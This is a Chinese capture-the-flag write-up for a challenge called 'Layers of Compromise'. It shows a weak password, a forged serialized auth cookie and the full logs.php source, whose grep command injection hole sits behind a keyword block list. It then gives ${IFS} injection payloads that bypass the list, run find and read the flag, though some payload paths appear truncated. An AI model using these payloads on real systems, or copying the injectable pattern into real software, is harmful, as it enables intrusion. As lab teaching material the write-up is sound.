[OpenHarmony CTF 2025]Layers of Compromise
server:TinyFat/0.99.75
x-powered-by:PHP/8.3.21
nginx/1.24.0
.htaccess没起作用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # .htaccess
Options -Indexes
php_flag display_errors off
<Files "config.php">
Order Allow,Deny
Deny from all
</Files>
# 限制访问API目录
<FilesMatch "^debug\.php$">
Order Deny,Allow
Deny from all
</FilesMatch>
|
弱口令user:password123
(((((((((((((((((((((((((((((爆了一天admin
1
2
3
4
5
6
7
8
9
10
11
12
13
| 内部API令牌:
c7ad44cbad762a5da0a452f9e854fdc1e0e7a52a38015f23f3eab1d80b931dd472634dfac71cd34ebc35d16ab7fb8a90c81f975113d6c7538dc69dd8de9077ec
内部API端点:
status
config
debug (仅限本地访问)
查看 /data/app/www/secrettttts/ 获取开发令牌。
|
api调用status端点得到
{“status”:”ok”,”server”:”Apache/2.4.52”,”php”:”8.3.21”}
Config
{“debug_mode”:false,”max_upload”:”2M”,”log_path”:”/var/log/apache2/access.log”}
???????披着nginx的Apache??????
访问/secrettttts/token.txt
1
2
3
4
5
6
7
8
9
10
11
| 7f8a1a4b3c7d9e6f2b5s8d7f9g6h5j4k3l2m1n
--auth.php
if (isset($_COOKIE['auth_token'])) {
$auth_data = unserialize(base64_decode($_COOKIE['auth_token']));
if ($auth_data['username'] === 'dev' &&
$auth_data['hash'] === md5('dev' . $CONFIG['auth_key'])) {
return true;
}
}
--
'username'=>'dev' 'auth_key' => 'S3cr3tK3y!2023'
|
反序列化
1
2
3
4
5
6
7
| <?php
$a = ['auth_key' => 'S3cr3tK3y!2023'];
$b= ['username' => 'dev', 'hash' => md5('dev' . $CONFIG['auth_key'])];
$serialized = serialize($b);
$base64_encoded = base64_encode($serialized);
echo $base64_encoded;
?>
|
然后可以带着这个cookie访问出logs.php(在之前访问api.php是会出现logs.php但是无授权访问)
过滤日志这里存在rce
发现空格和|还有flag等常见的cat、tac、more等都被ban了((((((
“${IFS}logs.php;”读logs.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
| <?php
require_once 'config.php';
require_once 'auth.php';
if (!check_auth() || !is_developer()) {
header('Location: index.php');
exit;
}
$role = get_role();
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
$log_dir = 'E:\tools\Web\phpStudy_64\Extensions\Nginx1.15.11\logs';
$log_file = $log_dir . '\access.log';
} else {
$log_dir = '/data/app/nginx/logs';
$log_file = $log_dir . '/access.log';
}
$log_content = '';
$filter = '';
$debug_info = '';
$error_message = '';
if (!is_dir($log_dir)) {
mkdir($log_dir, 0755, true);
}
// 如果不存在则创建示例日志文件
if (!file_exists($log_file)) {
$dummy_log = "192.168.1.1 - - [01/Jan/2023:12:00:00 +0000] \"GET / HTTP/1.1\" 200 1234 \"-\" \"Mozilla/5.0\"\n";
$dummy_log .= "192.168.1.2 - - [01/Jan/2023:12:05:00 +0000] \"GET /login.php HTTP/1.1\" 200 987 \"-\" \"Mozilla/5.0\"\n";
$dummy_log .= "192.168.1.1 - - [01/Jan/2023:12:10:00 +0000] \"POST /login.php HTTP/1.1\" 302 0 \"-\" \"Mozilla/5.0\"\n";
file_put_contents($log_file, $dummy_log);
}
// 输入过滤函数
function validate_filter_input($input) {
// 禁用的字符和字符串
$forbidden = [' ', '|', 'cat', 'tac', 'tail', 'more', 'less', 'flag'];
foreach ($forbidden as $forbidden_str) {
if (strpos($input, $forbidden_str) !== false) {
return false;
}
}
return true;
}
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
if ($_POST['action'] === 'filter_logs' && isset($_POST['filter'])) {
$filter = $_POST['filter'];
// 输入验证:检查是否包含禁用字符
if (!validate_filter_input($filter)) {
$error_message = "不可以这样!!";
$log_content = '';
} else {
// 漏洞4: 命令注入漏洞
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
// Windows命令
$cmd = 'findstr "' . $filter . '" "' . $log_file . '" 2>&1';
} else {
// Linux命令
$cmd = "grep \"" . $filter . "\" \"" . $log_file . "\" 2>&1";
}
// 执行命令
$log_content = shell_exec($cmd);
// 调试信息
$debug_info .= "<strong>text:</strong> <pre>" . htmlspecialchars($log_content) . "</pre>";
$debug_info .= "</div>";
// 如果没有输出,尝试其他方法
if (empty($log_content)) {
if (function_exists('exec')) {
exec($cmd, $output, $return_var);
$log_content = implode("\n", $output);
$debug_info .= "<div style='background:#ffffcc; padding:10px; margin:10px 0;'>";
$debug_info .= "<strong>尝试exec函数:</strong><br>";
$debug_info .= "<strong>返回值:</strong> " . $return_var . "<br>";
$debug_info .= "<strong>输出:</strong> <pre>" . htmlspecialchars($log_content) . "</pre>";
$debug_info .= "</div>";
}
}
}
}
} else {
// 默认显示所有日志
if (file_exists($log_file)) {
$log_content = file_get_contents($log_file);
} else {
$log_content = "日志文件不存在: " . $log_file;
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>日志 - 安全文档系统</title>
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css">
<style>
body {
padding-top: 60px;
}
.sidebar {
position: fixed;
top: 0;
bottom: 0;
left: 0;
z-index: 100;
padding: 90px 0 0;
box-shadow: inset -1px 0 0 rgba(0, 0, 0, .1);
background-color: #f8f9fa;
}
.sidebar-sticky {
position: relative;
top: 0;
height: calc(100vh - 90px);
padding-top: .5rem;
overflow-x: hidden;
overflow-y: auto;
}
.main-content {
padding: 20px;
}
.logs-display {
font-family: monospace;
background-color: #000;
color: #ccc;
padding: 15px;
border-radius: 5px;
white-space: pre-wrap;
max-height: 500px;
overflow-y: auto;
}
</style>
</head>
<body>
<nav class="navbar navbar-expand-md navbar-dark bg-dark fixed-top">
<div class="container-fluid">
<a class="navbar-brand" href="#">安全文档系统</a>
<div class="collapse navbar-collapse">
<ul class="navbar-nav me-auto mb-2 mb-md-0">
<li class="nav-item">
<a class="nav-link" href="dashboard.php">控制面板</a>
</li>
</ul>
<div class="d-flex">
<span class="navbar-text me-3">
欢迎, <?php echo htmlspecialchars($_COOKIE['username']); ?> (<?php echo htmlspecialchars($role); ?>)
</span>
<form method="post" action="index.php">
<input type="hidden" name="action" value="logout">
<button type="submit" class="btn btn-outline-light">退出</button>
</form>
</div>
</div>
</div>
</nav>
<div class="container-fluid">
<div class="row">
<nav id="sidebar" class="col-md-3 col-lg-2 d-md-block sidebar">
<div class="sidebar-sticky">
<ul class="nav flex-column">
<li class="nav-item">
<a class="nav-link" href="dashboard.php">
首页
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="documents.php">
文档
</a>
</li>
<li class="nav-item">
<a class="nav-link" href="templates.php">
模板编辑器
</a>
</li>
<?php if (is_developer()): ?>
<li class="nav-item">
<a class="nav-link active" href="logs.php">
日志
</a>
</li>
<?php endif; ?>
<?php if (is_admin() || is_developer()): ?>
<li class="nav-item">
<a class="nav-link" href="api.php">
API访问
</a>
</li>
<?php endif; ?>
</ul>
</div>
</nav>
<main class="col-md-9 ms-sm-auto col-lg-10 px-md-4 main-content">
<div class="d-flex justify-content-between flex-wrap flex-md-nowrap align-items-center pt-3 pb-2 mb-3 border-bottom">
<h1 class="h2">系统日志 <span class="badge bg-warning">仅限开发者</span></h1>
</div>
<?php if ($error_message): ?>
<div class="alert alert-danger" role="alert">
<?php echo htmlspecialchars($error_message); ?>
</div>
<?php endif; ?>
<?php echo $debug_info; ?>
<div class="card mb-4">
<div class="card-header">
<h3 class="h5 mb-0">过滤日志</h3>
</div>
<div class="card-body">
<form method="post">
<input type="hidden" name="action" value="filter_logs">
<div class="input-group mb-3">
<input type="text" class="form-control" placeholder="按关键词过滤日志" name="filter" value="<?php echo htmlspecialchars($filter); ?>">
<button class="btn btn-outline-primary" type="submit">过滤</button>
</div>
<small class="text-muted">不可以这样!!</small>
</form>
</div>
</div>
<h3>日志内容 <?php echo $filter ? '(已过滤: ' . htmlspecialchars($filter) . ')' : ''; ?></h3>
<div class="logs-display">
<?php echo htmlspecialchars($log_content ?: '没有找到日志。'); ?>
</div>
</main>
</div>
</div>
</body>
</html>
|
"${IFS}logs.php;find${IFS}/${IFS}-name${IFS}fla;"
得到flag在/data/flag/flag.txt
"${IFS}/data/fla/fla;"
得到flag
.PNG)
